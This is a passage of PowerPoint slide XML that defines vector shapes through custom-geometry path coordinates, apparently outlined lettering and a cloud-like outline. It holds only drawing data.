                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="14958" y="70836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14958" y="77147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51161" y="70836"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="415833" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="430791" y="27264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420779" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="34336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="27264"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="410961" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370739" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="32542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415833" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="27264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430791" y="21996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410961" y="14804"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="431164" h="618489">
                  <a:moveTo>
                    <a:pt x="366930" y="14804"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="368763" y="15469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370739" y="15124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="366930" y="14804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807814C7-6E11-1AE1-EF81-3C89B39C406F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4571918" y="3701818"/>
              <a:ext cx="573405" cy="155575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="573404" h="155575">
                  <a:moveTo>
                    <a:pt x="573012" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573012" y="155447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573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889F6010-6F21-CBA8-48B9-BDDBB7EAC6CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583419" y="3732338"/>
              <a:ext cx="551180" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="64758" y="4063"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61730" y="55839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61730" y="38343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="38343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23184" y="21539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64758" y="21539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64758" y="4063"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="103954" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82050" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82050" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103954" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103954" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="104564" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="81440" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81440" y="16560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104564" y="16560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104564" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="147723" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="125818" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125818" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="48788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150466" y="47812"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153026" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157781" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175215" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="168268" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170847" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172350" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173379" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="175215" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="165912" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163796" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156704" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152518" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147723" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175215" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="223210" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187082" y="45625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184501" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185183" y="68788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208929" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209109" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217192" y="95677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226847" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232151" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236987" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245724" y="94020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250377" y="92577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221930" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216423" y="79471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208946" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206914" y="69738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206589" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256595" y="56733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256313" y="52752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256231" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206528" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206836" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206853" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208356" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211079" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213707" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217236" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252160" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251880" y="37219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248224" y="32552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243518" y="28883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237782" y="26261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231394" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232329" y="24774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223210" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="255315" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252877" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250377" y="74960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246964" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238308" y="80060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233837" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="80893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255315" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="252160" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="225974" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229326" y="38953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231460" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233614" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234671" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234752" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234853" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256231" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256070" y="49311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254681" y="43566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254607" y="43261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254497" y="42806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="252160" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="289818" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266897" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287847" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311255" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317585" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301522" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289818" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="341957" y="48483"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="324991" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338869" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362054" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368619" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349252" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341957" y="48483"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="335415" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="316071" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301522" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317585" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324991" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341957" y="48483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335415" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="383186" y="26273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="360753" y="26273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349252" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368619" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383186" y="26273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462536" y="39319"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429047" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433579" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439715" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441260" y="45516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441260" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434818" y="50007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428621" y="50576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394953" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394908" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396963" y="86237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="405900" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406192" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411105" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420330" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422870" y="96011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425817" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423805" y="81259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421204" y="80487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="420107" y="79898"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419172" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418197" y="78272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417587" y="77419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417100" y="75651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="416978" y="70957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417567" y="69230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462536" y="39319"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462798" y="87213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441138" y="87213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="87213"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="462798" y="62443"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="441138" y="62443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="441138" y="76606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439431" y="78049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437460" y="79227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432659" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432365" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430754" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462798" y="62443"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="427605" y="24343"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="422383" y="24343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417181" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406777" y="26415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="403018" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400722" y="27736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400722" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402713" y="44175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404501" y="43484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407427" y="42509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415335" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415113" y="40050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419457" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462536" y="39319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460035" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454508" y="30073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="449727" y="27566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="443647" y="25775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436603" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437440" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427605" y="24343"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="507278" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="485373" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485373" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507278" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507278" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="551179" h="96520">
                  <a:moveTo>
                    <a:pt x="551046" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="529121" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529121" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551046" y="94426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5510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279CF8A6-30D7-6EE9-87E0-8318B8BCDBFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5352201" y="3008351"/>
              <a:ext cx="1285240" cy="821690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1285240" h="821689">
                  <a:moveTo>
                    <a:pt x="538565" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498897" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477538" y="3037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456178" y="9111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="447024" y="12149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436344" y="15186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389048" y="41003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350906" y="74412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="344803" y="83524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338701" y="91117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332598" y="100229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328021" y="107822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323444" y="116934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317341" y="126046"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314290" y="136676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308187" y="154900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="305136" y="165530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303610" y="174642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300559" y="195903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300559" y="223238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291405" y="224757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280725" y="226276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271571" y="229313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260891" y="232350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253263" y="236906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244108" y="242981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236480" y="247536"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212069" y="277909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="314356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198338" y="326505"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="332580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199864" y="341692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189184" y="338654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176978" y="335617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164773" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154093" y="334098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137311" y="335617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93066" y="346247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54924" y="367508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25936" y="397881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6102" y="435847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="463182"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="493555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10679" y="534558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33564" y="569486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67129" y="596822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79335" y="605933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93066" y="610489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106797" y="616564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122054" y="619601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137311" y="621120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154093" y="622638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163247" y="622638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173927" y="621120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173927" y="634787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175453" y="643899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175453" y="653011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178504" y="662123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180030" y="669716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186133" y="687940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190710" y="695533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195287" y="704644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224275" y="741092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254788" y="766908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289879" y="786651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329547" y="800318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363112" y="806393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373791" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384471" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396677" y="809430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408882" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421087" y="807911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445498" y="804874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457704" y="801837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479063" y="795762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491269" y="792725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500423" y="788169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511103" y="782095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520257" y="777539"/>
                  </a:lnTo>
